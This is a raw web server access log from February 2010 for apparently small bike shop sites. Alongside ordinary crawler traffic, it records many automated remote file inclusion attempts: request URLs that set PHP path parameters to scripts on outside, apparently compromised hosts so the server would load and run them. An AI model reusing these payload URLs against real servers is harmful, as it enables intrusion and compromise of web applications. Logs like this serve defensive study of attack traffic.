38.100.41.66 - - [09/Feb/2010:18:29:44 -0800] "GET /translations/Swedish.txt HTTP/1.1" 200 31485 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
194.1.150.2 - - [09/Feb/2010:18:29:44 -0800] "GET /delete_comment.php?board_skin_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.1.150.2 - - [09/Feb/2010:18:29:44 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.1.150.2 - - [09/Feb/2010:18:29:44 -0800] "GET /logs//delete_comment.php?board_skin_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
38.100.41.66 - - [09/Feb/2010:18:29:45 -0800] "GET /translations/Italian.txt HTTP/1.1" 200 33975 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
194.1.150.2 - - [09/Feb/2010:18:29:47 -0800] "GET /logs//delete_comment.php?board_skin_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.1.150.2 - - [09/Feb/2010:18:29:47 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.1.150.2 - - [09/Feb/2010:18:29:47 -0800] "GET /delete_comment.php?board_skin_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
38.100.41.66 - - [09/Feb/2010:18:29:48 -0800] "GET /tmp/mailError.log HTTP/1.1" 200 4160 "http://www.bicyclestoreshouston.com/tmp/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:48 -0800] "GET /index.html HTTP/1.1" 404 - "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:51 -0800] "GET /contactus.html HTTP/1.1" 404 - "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:53 -0800] "GET /aboutus.html HTTP/1.1" 404 - "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
194.1.150.2 - - [09/Feb/2010:18:29:56 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.1.150.2 - - [09/Feb/2010:18:29:56 -0800] "GET /logs//delete_comment.php?board_skin_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.1.150.2 - - [09/Feb/2010:18:29:56 -0800] "GET /delete_comment.php?board_skin_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
38.100.41.66 - - [09/Feb/2010:18:30:56 -0800] "GET /Clinc.html HTTP/1.1" 404 - "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:30:58 -0800] "GET /Rides.html HTTP/1.1" 404 - "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:31:01 -0800] "GET /Accessories.html HTTP/1.1" 404 - "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:31:04 -0800] "GET /Bikes.html HTTP/1.1" 404 - "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:31:07 -0800] "GET /services.html HTTP/1.1" 404 - "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:31:09 -0800] "GET /Product.html HTTP/1.1" 404 - "http://www.bicyclestoreshouston.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
200.93.147.154 - - [09/Feb/2010:18:32:01 -0800] "GET ///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:18:32:01 -0800] "GET /logs////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:18:32:01 -0800] "GET /logs/access.log////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.13.69.245 - - [09/Feb/2010:18:34:09 -0800] "GET /bbs/delete.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.13.69.245 - - [09/Feb/2010:18:34:09 -0800] "GET /logs/access.log//bbs/delete.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.13.69.245 - - [09/Feb/2010:18:34:09 -0800] "GET /logs//bbs/delete.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.74.145.119 - - [09/Feb/2010:18:35:23 -0800] "GET /write_comment_update.php?board_skin_path=http://bethelphotoworks.com//joomla15/templates/rt_perihelion/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.74.145.119 - - [09/Feb/2010:18:35:23 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://bethelphotoworks.com//joomla15/templates/rt_perihelion/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.74.145.119 - - [09/Feb/2010:18:35:27 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://bethelphotoworks.com//joomla15/templates/rt_perihelion/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.82.114.106 - - [09/Feb/2010:18:35:28 -0800] "GET /logs/access.log//login.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.74.145.119 - - [09/Feb/2010:18:36:23 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://bethelphotoworks.com//joomla15/templates/rt_perihelion/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.74.145.119 - - [09/Feb/2010:18:36:23 -0800] "GET /write_comment_update.php?board_skin_path=http://bethelphotoworks.com//joomla15/templates/rt_perihelion/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.74.145.119 - - [09/Feb/2010:18:36:23 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://bethelphotoworks.com//joomla15/templates/rt_perihelion/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:18:38:33 -0800] "GET /logs/access.log//skin/zero_vote//login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:18:38:59 -0800] "GET /logs/access.log//skin/zero_vote//login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [09/Feb/2010:18:40:13 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [09/Feb/2010:18:40:13 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [09/Feb/2010:18:40:13 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [09/Feb/2010:18:40:44 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [09/Feb/2010:18:40:44 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [09/Feb/2010:18:40:44 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.172.27 - - [09/Feb/2010:18:42:42 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.172.27 - - [09/Feb/2010:18:42:43 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.254.172.27 - - [09/Feb/2010:18:42:43 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:18:44:35 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:18:44:35 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:18:44:35 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:18:44:36 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:18:44:36 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:18:44:36 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:18:45:52 -0800] "GET /logs/access.log%20%20////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:18:47:46 -0800] "GET /logs/access.log%20%20////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [09/Feb/2010:19:03:04 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [09/Feb/2010:19:03:05 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [09/Feb/2010:19:03:05 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.161.132 - - [09/Feb/2010:19:07:27 -0800] "GET /logs/access.log%20%20/////////?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.161.132 - - [09/Feb/2010:19:07:27 -0800] "GET ////////?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 200 1754 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.161.132 - - [09/Feb/2010:19:07:27 -0800] "GET /logs/////////?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 200 2364 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.249.65.109 - - [09/Feb/2010:19:14:50 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "houstonbikeshop.com"
79.98.23.9 - - [09/Feb/2010:19:15:40 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.10 - - [09/Feb/2010:19:19:55 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.bicyclestoreshouston.com"
67.218.116.134 - - [09/Feb/2010:19:40:10 -0800] "GET /translations/Japanese.txt HTTP/1.0" 200 32739 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:19:41:41 -0800] "GET /logs/access.log//portail//index2.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:19:41:41 -0800] "GET /portail//index2.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:19:41:41 -0800] "GET /logs//portail//index2.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.6.218.57 - - [09/Feb/2010:19:43:50 -0800] "GET /login.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.6.218.57 - - [09/Feb/2010:19:43:56 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.6.218.57 - - [09/Feb/2010:19:43:56 -0800] "GET /logs//login.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.120 - - [09/Feb/2010:19:51:10 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.carex.co.kr/bnp/data/log/.rr1??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
87.253.63.102 - - [09/Feb/2010:19:51:13 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.carex.co.kr/bnp/data/log/.rr1??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
189.6.218.57 - - [09/Feb/2010:20:00:41 -0800] "GET /logs/access.log//login.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:20:15:04 -0800] "GET /login.php?dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:20:15:07 -0800] "GET /logs//login.php?dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:20:15:07 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.25.28 - - [09/Feb/2010:20:19:49 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "houstonbikeshop.com"
65.55.109.130 - - [09/Feb/2010:20:21:33 -0800] "GET /bullitinboard/ HTTP/1.1" 200 533 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; MS-RTC LM 8)" "www.svbikes.com"
210.116.103.96 - - [09/Feb/2010:20:25:58 -0800] "GET /skin/zero_vote/error.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.116.103.96 - - [09/Feb/2010:20:25:58 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.116.103.96 - - [09/Feb/2010:20:25:58 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:20:30:57 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.singa.pe.kr/bbs/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:20:30:57 -0800] "GET /logs//login.php?dir=http://www.singa.pe.kr/bbs/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:20:30:57 -0800] "GET /login.php?dir=http://www.singa.pe.kr/bbs/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:20:37:11 -0800] "GET /login.php?dir=http://www.singa.pe.kr/bbs/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:20:37:11 -0800] "GET /logs//login.php?dir=http://www.singa.pe.kr/bbs/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:20:37:11 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.singa.pe.kr/bbs/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.115.119 - - [09/Feb/2010:20:42:17 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.115.119 - - [09/Feb/2010:20:42:19 -0800] "GET /bullitinboard/viewtopic.php?p=12754 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
208.86.186.80 - - [09/Feb/2010:20:43:29 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.ccio2bilan.fr/media/pdf/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
208.86.186.80 - - [09/Feb/2010:20:43:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ccio2bilan.fr/media/pdf/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
208.86.186.80 - - [09/Feb/2010:20:43:29 -0800] "GET /skin/zero_vote/error.php?dir=http://www.ccio2bilan.fr/media/pdf/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
211.115.68.54 - - [09/Feb/2010:20:45:29 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.68.54 - - [09/Feb/2010:20:45:29 -0800] "GET /delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.68.54 - - [09/Feb/2010:20:45:29 -0800] "GET /logs//delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.250.92.73 - - [09/Feb/2010:20:45:33 -0800] "GET /delete_all.php?board_skin_path=http://www.mejusa.com/data/file/gallery/thumb/LICENSE.txt/f1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.250.92.73 - - [09/Feb/2010:20:45:33 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.mejusa.com/data/file/gallery/thumb/LICENSE.txt/f1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.250.92.73 - - [09/Feb/2010:20:45:33 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.mejusa.com/data/file/gallery/thumb/LICENSE.txt/f1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.36.173.93 - - [09/Feb/2010:20:47:58 -0800] "GET /skin/zero_vote/error.php?dir=http://www.ccio2bilan.fr/media/pdf/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
201.36.173.93 - - [09/Feb/2010:20:48:03 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.ccio2bilan.fr/media/pdf/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
211.115.68.54 - - [09/Feb/2010:20:50:38 -0800] "GET /delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.68.54 - - [09/Feb/2010:20:50:38 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.68.54 - - [09/Feb/2010:20:50:38 -0800] "GET /logs//delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.207.8.238 - - [09/Feb/2010:20:51:10 -0800] "GET /skin/zero_vote/error.php?dir=http://www.ccio2bilan.fr/media/pdf/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
200.207.8.238 - - [09/Feb/2010:20:51:27 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.ccio2bilan.fr/media/pdf/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
200.207.8.238 - - [09/Feb/2010:20:51:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ccio2bilan.fr/media/pdf/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
61.250.92.73 - - [09/Feb/2010:20:52:38 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.mejusa.com/data/file/gallery/thumb/LICENSE.txt/f1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.250.92.73 - - [09/Feb/2010:20:52:38 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.mejusa.com/data/file/gallery/thumb/LICENSE.txt/f1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.250.92.73 - - [09/Feb/2010:20:52:38 -0800] "GET /delete_all.php?board_skin_path=http://www.mejusa.com/data/file/gallery/thumb/LICENSE.txt/f1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.115.111 - - [09/Feb/2010:21:09:32 -0800] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
109.123.64.129 - - [09/Feb/2010:21:22:02 -0800] "GET /logs/access.log//index.php?board_skin_path=http://www.bluefrogcards.co.uk//banner/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
109.123.64.129 - - [09/Feb/2010:21:22:02 -0800] "GET /index.php?board_skin_path=http://www.bluefrogcards.co.uk//banner/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
109.123.64.129 - - [09/Feb/2010:21:22:02 -0800] "GET /logs//index.php?board_skin_path=http://www.bluefrogcards.co.uk//banner/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
109.123.64.129 - - [09/Feb/2010:21:24:05 -0800] "GET /index.php?board_skin_path=http://www.bluefrogcards.co.uk//banner/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
109.123.64.129 - - [09/Feb/2010:21:24:05 -0800] "GET /logs/access.log%20%20//index.php?board_skin_path=http://www.bluefrogcards.co.uk//banner/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
109.123.64.129 - - [09/Feb/2010:21:24:05 -0800] "GET /logs//index.php?board_skin_path=http://www.bluefrogcards.co.uk//banner/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.193.75 - - [09/Feb/2010:21:30:52 -0800] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
119.63.193.75 - - [09/Feb/2010:21:32:54 -0800] "GET /bullitinboard/viewtopic.php?p=3505 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
186.28.232.13 - - [09/Feb/2010:21:33:16 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
186.28.232.13 - - [09/Feb/2010:21:33:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
